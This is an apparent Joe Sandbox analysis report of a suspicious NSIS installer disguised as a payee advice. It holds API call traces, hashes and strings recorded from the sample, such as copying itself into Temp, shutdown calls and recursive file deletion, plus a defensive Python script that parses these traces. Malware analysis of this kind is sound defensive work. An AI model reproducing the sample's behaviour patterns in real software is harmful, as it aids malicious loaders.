• CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403665
• SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366C
• DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C6
• CopyFileW.KERNEL32(C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe,0041FE90,00000001), ref: 004036DA
• CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403707
• GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375D
• ExitWindowsEx.USER32(00000002,00000000), ref: 00403799
• ExitProcess.KERNEL32 ref: 004037BC
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
Similarity
• API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
• String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$C:\Users\user\AppData\Local\foreslaaende$C:\Users\user\Desktop$C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
• API String ID: 4107622049-1871193868

Control-flow Graph (entry block 404b10-404b5c; rendered graph and edge list omitted)
                                                                                                                                          APIs
                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404B28
                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404B33
                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B7D
                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404B90
                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BBD
                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BCF
                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404BF1
                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C03
                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404C06
                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C31
                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C3D
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CD3
                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404CFE
                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D12
                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404D41
                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D4F
                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404D60
                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E5D
                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EC2
                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404ED7
                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404EFB
                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F1B
                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00404F30
                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00404F40
                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FB9
                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 00405062
                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405071
                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00405091
                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 004050DF
                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 004050EA
                                                                                                                                          • ShowWindow.USER32(00000000), ref: 004050F1
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                          • String ID: $M$N
                                                                                                                                          • API String ID: 1638840714-813528018
                                                                                                                                          • Opcode ID: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                          • Instruction ID: d71a5cbf05b966a5fca8a5aa47d1df2e6c399d67ef135bcf6f64f468dd7cdb7f
                                                                                                                                          • Opcode Fuzzy Hash: db08064a331c8b710d2bfbefb5f5365b1a6743964771edbed48d05eba51cbb05
                                                                                                                                          • Instruction Fuzzy Hash: 6E027FB0900209EFEB209F54DD85AAE7BB5FB84314F10857AF610BA2E0D7799D52CF58

                                                                                                                                          Control-flow Graph

Control-flow graph (rendered image; the node and edge list is not reproduced): function at 00405F0C, basic blocks 00405F0C through 0040617B. Calls GetVersion, GetSystemDirectoryW, GetWindowsDirectoryW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, CoTaskMemFree, lstrcatW and lstrlenW, plus the internal routines 00405EEA, 00405E31, 00405DB7 and 0040617E; it also calls itself at 00406125.
                                                                                                                                          APIs
                                                                                                                                          • GetVersion.KERNEL32(00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00405FCF
                                                                                                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604D
                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 00406060
                                                                                                                                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609C
                                                                                                                                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060AA
                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 004060B5
                                                                                                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D9
                                                                                                                                          • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051CB,004216B0,00000000,00000000,00000000), ref: 00406133
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                          • API String ID: 900638850-1230650788
                                                                                                                                          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                          • Instruction ID: 201fcfe404e7502d8ff22bbbb8bc1db0d7d07a9235330109bbd625d5d43c8b09
                                                                                                                                          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                                                                                                                                          • Instruction Fuzzy Hash: 93612371A40516EBDB209F24CC44AAF37A5EF00314F51813BE546BA2E0D73D8AA2CB4E

                                                                                                                                          Control-flow Graph

Control-flow graph (rendered image; the node and edge list is not reproduced): function at 00405772, basic blocks 00405772 through 00405932. Calls DeleteFileW, lstrcatW, lstrlenW, FindFirstFileW, FindNextFileW and FindClose, plus the internal routines 00405A3D, 00405EEA, 00405981, 0040622D, 00405935, 0040572A, 00405194 and 00405D84; it calls itself at 00405875 from inside the FindNextFileW loop, consistent with recursing into subdirectories.
                                                                                                                                          APIs
                                                                                                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040579B
                                                                                                                                          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 004057E3
                                                                                                                                          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 00405806
                                                                                                                                          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040580C
                                                                                                                                          • FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040581C
                                                                                                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 004058CB
                                                                                                                                          Strings
                                                                                                                                          • "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe", xrefs: 0040577B
                                                                                                                                          • \*.*, xrefs: 004057DD
                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405780
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                                                                          • API String ID: 2035342205-3119803337
                                                                                                                                          • Opcode ID: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                          • Instruction ID: 64b0c8684543101156bed993c7ef625b5cb6937b92a1292c702a5556077473ca
                                                                                                                                          • Opcode Fuzzy Hash: 91addf2f7801abc8b01003351af1a773a3a4ecd8c4e6fa2132f7e8029f9d92b7
                                                                                                                                          • Instruction Fuzzy Hash: 4341B031800914EADF217B619C89ABF7678EF45728F10817BF800B51D1D77C4992DE6E
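The API trace lines of the three functions above (the dialog routine that installs its own window procedure with SetWindowLongW and drives a tree view and combo box through SendMessageW, the directory-resolution routine, and the FindFirstFileW/FindNextFileW/DeleteFileW loop) are easier to reason about once they are parsed rather than read raw. The following Python is an added example for this report section; it is not part of Joe Sandbox or its IDA plugin. It parses the `• Func.MODULE(args), ref: ADDR` line format printed above, resolves the winuser.h/commctrl.h message IDs and the GWL_* indexes that occur in these traces, and tags two behaviours an analyst would note. The sample input is copied from the trace lines above; the tag names and the two heuristics are this example's own assumptions.

```python
"""Parse Joe Sandbox API trace lines ('• Func.MODULE(args), ref: ADDR') into records,
resolve the Win32 constants they carry, and tag notable behaviour per function.
Added example; not part of Joe Sandbox or its IDA plugin."""
import re
from typing import NamedTuple

API_LINE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Message IDs from winuser.h / commctrl.h for the SendMessageW calls in the traces above.
WM_NAMES = {
    0x0143: "CB_ADDSTRING", 0x0147: "CB_GETCURSEL", 0x014E: "CB_SETCURSEL",
    0x0150: "CB_GETITEMDATA", 0x0151: "CB_SETITEMDATA", 0x0200: "WM_MOUSEMOVE",
    0x1102: "TVM_EXPAND", 0x1109: "TVM_SETIMAGELIST", 0x110A: "TVM_GETNEXTITEM",
    0x111B: "TVM_SETITEMHEIGHT", 0x111C: "TVM_GETITEMHEIGHT",
    0x1132: "TVM_INSERTITEMW", 0x113F: "TVM_SETITEMW",
}
# GWL_STYLE is -16 and GWL_WNDPROC is -4; the trace prints them as 000000F0 / 000000FC,
# so the lookup keys on the low byte.
GWL_NAMES = {0xF0: "GWL_STYLE", 0xFC: "GWL_WNDPROC"}


class ApiCall(NamedTuple):
    func: str
    module: str
    args: tuple   # None for '?', int for an 8-digit hex value, str for anything else
    ref: int      # call-site address


def _split_args(raw):
    """Split on commas that are outside double quotes, so a quoted path stays whole."""
    if not raw.strip():
        return []
    out, cur, quoted = [], [], False
    for ch in raw:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            out.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    out.append("".join(cur))
    return [a.strip() for a in out]


def _decode_arg(a):
    if a == "?":
        return None
    if re.fullmatch(r"[0-9A-Fa-f]{8}", a):
        return int(a, 16)
    return a.strip('"')


def parse_api_lines(text):
    """Return one ApiCall per recognisable trace line; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = tuple(_decode_arg(a) for a in _split_args(m["args"]))
            calls.append(ApiCall(m["func"], m["module"], args, int(m["ref"], 16)))
    return calls


def describe(call):
    """One-line rendering with message IDs and GWL_* indexes resolved where known."""
    a = call.args
    if call.func == "SendMessageW" and len(a) > 1 and isinstance(a[1], int):
        return f"{call.ref:08X} SendMessageW {WM_NAMES.get(a[1], '0x%04X' % a[1])}"
    if call.func in ("SetWindowLongW", "GetWindowLongW") and len(a) > 1 and isinstance(a[1], int):
        return f"{call.ref:08X} {call.func} {GWL_NAMES.get(a[1] & 0xFF, '0x%08X' % a[1])}"
    return f"{call.ref:08X} {call.func}"


def findings(calls):
    """Behaviour tags (this example's own labels) derived from one function's trace."""
    tags = set()
    # SetWindowLongW(hwnd, GWL_WNDPROC, proc): the function installs its own window
    # procedure on a control (subclassing); the new procedure address is recorded.
    for c in calls:
        if (c.func == "SetWindowLongW" and len(c.args) == 3
                and isinstance(c.args[1], int) and c.args[1] & 0xFF == 0xFC
                and isinstance(c.args[2], int)):
            tags.add(("SUBCLASSED_WNDPROC", c.args[2]))
    # FindFirstFileW on "<dir>\*.*", a FindNextFileW loop and DeleteFileW in the same
    # function: the recursive directory-wipe pattern.
    names = {c.func for c in calls}
    wildcard = any(isinstance(x, str) and x.endswith("\\*.*") for c in calls for x in c.args)
    if {"FindFirstFileW", "FindNextFileW", "DeleteFileW"} <= names and wildcard:
        tags.add(("RECURSIVE_DELETE", None))
    return tags


# Sample input copied from the trace lines above (a subset of each function's calls).
FUNC_404B10 = r"""
• GetDlgItem.USER32(?,000003F9), ref: 00404B28
• SetWindowLongW.USER32(?,000000FC,00405108), ref: 00404BA9
• SendMessageW.USER32(?,00001109,00000002), ref: 00404BE5
• GetWindowLongW.USER32(?,000000F0), ref: 00404D41
"""
FUNC_405772 = r"""
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040579B
• lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 004057E3
• FindFirstFileW.KERNELBASE(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 0040581C
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BC
• FindClose.KERNEL32(00000000), ref: 004058CB
"""

if __name__ == "__main__":
    for name, text in (("00404B10", FUNC_404B10), ("00405772", FUNC_405772)):
        calls = parse_api_lines(text)
        print(f"function {name}: {sorted(findings(calls))}")
        for c in calls:
            print("  " + describe(c))
```

Running the script on the two samples yields the SUBCLASSED_WNDPROC tag with the replacement procedure 00405108 for the dialog function and the RECURSIVE_DELETE tag for the function at 00405772. The GWL lookup keys on the low byte on purpose: the trace prints the negative GWL_* indexes zero-extended, and matching on the full value would miss them.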
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.000000000044F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2665086131.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_PayeeAdvice_HK54912_R0038704_37504.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                          • Instruction ID: edf170fb2c3714e597751af3e8fd03d842b3b080db723bf9ee749212abe0df6d
                                                                                                                                          • Opcode Fuzzy Hash: 30143bd0a3c86c84675fe989439f4e854c087b2e65987d853f873e8b3ce332d5
                                                                                                                                          • Instruction Fuzzy Hash: D3F17771D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A96CF44
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A86,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,75922EE0,00405792,?,C:\Users\user\AppData\Local\Temp\,75922EE0), ref: 00406238
                                                                                                                                          • FindClose.KERNEL32(00000000), ref: 00406244
                                                                                                                                          Strings
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                                          • String ID: WB
                                                                                                                                          • API String ID: 2295610775-2854515933
                                                                                                                                          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                          • Instruction ID: f398094869b5afba054f99dea52ba5834f85055b19877d8081192ff4b2f0d438
                                                                                                                                          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                                                                                                                                          • Instruction Fuzzy Hash: DAD012319480209BC21037387E0C85B7A59AB493307524AB7F82AF27E0C738AC6586AD
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          Similarity
                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 310444273-0
                                                                                                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                          • Instruction ID: 46d0f10fa6fb29b22d4bf355a321a76136a9e9be6b3571ea53230c25cba9bd22
                                                                                                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                                                                                                          • Instruction Fuzzy Hash: 02E0CD36A08120ABC7115B309D44D6773BCAFE9601305053DF505F6240C774AC1297A9

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 00406254: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000008), ref: 00406266
                                                                                                                                            • Part of subcall function 00406254: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000008), ref: 00406271
                                                                                                                                            • Part of subcall function 00406254: GetProcAddress.KERNEL32(00000000,?), ref: 00406282
                                                                                                                                          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,75923420,00000000,"C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"), ref: 00403935
                                                                                                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B5
                                                                                                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\foreslaaende,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C8
                                                                                                                                          • GetFileAttributesW.KERNEL32(Call), ref: 004039D3
                                                                                                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\foreslaaende), ref: 00403A1C
                                                                                                                                            • Part of subcall function 00405E31: wsprintfW.USER32 ref: 00405E3E
                                                                                                                                          • RegisterClassW.USER32(00428180), ref: 00403A59
                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A71
                                                                                                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA6
                                                                                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADC
                                                                                                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403AED
                                                                                                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF8
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B08
                                                                                                                                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B15
                                                                                                                                          • RegisterClassW.USER32(00428180), ref: 00403B1E
                                                                                                                                          • DialogBoxParamW.USER32(?,00000000,00403C57,00000000), ref: 00403B3D
                                                                                                                                          Strings
                                                                                                                                          Similarity
                                                                                                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                          • String ID: "C:\Users\user\Desktop\PayeeAdvice_HK54912_R0038704_37504.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\foreslaaende$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                          • API String ID: 914957316-2256041598
                                                                                                                                          • Opcode ID: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                          • Instruction ID: b862c1471ebdc097eb7bd7ac0b5924faedec86185335dcace1f032bfb9465ac2
                                                                                                                                          • Opcode Fuzzy Hash: 8ef44c221ffc76618c9d3063fdfaa19d9e9f68cd4157665c5f0528a7ad94f78d
                                                                                                                                          • Instruction Fuzzy Hash: 5561B670604201BAE720AF669C46E3B3A6CEB45759F40453FF945B62E2CB786D02CA2D

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          APIs
                                                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C93
                                                                                                                                          • ShowWindow.USER32(?), ref: 00403CB0
                                                                                                                                          • DestroyWindow.USER32 ref: 00403CC4
                                                                                                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CE0
                                                                                                                                          • GetDlgItem.USER32(?,?), ref: 00403D01
                                                                                                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D15
• IsWindowEnabled.USER32(00000000), ref: 00403D1C
• GetDlgItem.USER32(?,00000001), ref: 00403DCA
• GetDlgItem.USER32(?,00000002), ref: 00403DD4
• SetClassLongW.USER32(?,000000F2,?), ref: 00403DEE
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E3F
• GetDlgItem.USER32(?,00000003), ref: 00403EE5
• ShowWindow.USER32(00000000,?), ref: 00403F06
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F18
• EnableWindow.USER32(?,?), ref: 00403F33
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F49
• EnableMenuItem.USER32(00000000), ref: 00403F50
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F68
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F7B
• lstrlenW.KERNEL32(004226D0,?,004226D0,004281E0), ref: 00403FA4
• SetWindowTextW.USER32(?,004226D0), ref: 00403FB8
• ShowWindow.USER32(?,0000000A), ref: 004040EC
Memory Dump Source
• Source File: 00000000.00000002.2664622803.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2664573128.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664665698.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2664772475.0000000000434000.00000004.00000001.01000000.00000003.sdmp
